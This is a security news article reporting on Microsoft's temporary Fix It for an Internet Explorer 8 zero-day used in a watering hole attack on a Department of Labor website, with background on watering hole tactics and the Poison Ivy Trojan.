Microsoft has released a Fix-It to address an Internet Explorer 8 zero-day that was exploited in a watering hole attack against the U.S. Department of Labor website last week.
The Fix It is a temporary mitigation until a patch is released. Microsoft’s next scheduled Patch Tuesday security updates are set for next week, though it’s unlikely an update for CVE-2013-1347 will be ready in time.
The vulnerability is present only in IE 8, Microsoft said. The flaw is a use-after free memory corruption bug that would allow an attacker to be able to remotely execute code on a compromised machine.
“The Fix It is an effort to help protect as many customers as possible, as quickly as possible,” said Dustin Childs, group manager Trustworthy Computing.
This is the second Fix It that Microsoft has issued this year. The first was also for a similar memory-related vulnerability in IE in January that was used in watering hole attacks against a number of government, political and manufacturing websites. IE 8 was the primary culprit there as well, though IE 6 and 7 were also vulnerable yet no exploits were public for those two versions.
According to Net Market Share, IE 8 has the highest market share with 23 percent, followed by IE 9 (18 percent) and Chrome 26.0 (13 percent). Experts who analyzed the attack against the Department of Labor’s Site Exposure Matrices website said that the typical government agency worker would likely still be running IE 8, making them a tempting target for such an attack.
Watering hole attacks are similar to drive-by downloads where an ad or a streaming file on a website is vulnerable to an iFrame attack. Javascript is injected into a Flash or Java applet that redirects the user to a third-party site where more malware is downloaded or credentials are stolen. The concept here is that the attacker infects a site of specific interest to their target, rather than spear phishing a narrow list of potential victims.
This tactic has been employed not only against government workers and political activists as part of espionage campaigns, but against a popular mobile developer’s website that ensnared a number of Facebook, Apple, Microsoft and Twitter employees.
In the case of the DoL, the target was likely downstream employees of the Department Energy who work on nuclear weapons programs, experts at Invincea speculated. The DoL’s SEM site is a resource for employees who may have been exposed to radiation. The redirect on the site was sending visitors to a site hosting the Poison Ivy remote access Trojan, malware that is used espionage campaigns; it opens a backdoor on compromised computers where attackers can move about unnoticed.
Microsoft’s first Fix It of 2013, however, wasn’t a smashing success. Shortly after it was released, researchers at Exodus Intelligence reported they were able to bypass it. While the Fix It did address one means attackers had at their disposal to get onto victims’ machines, it didn’t address all possible avenues.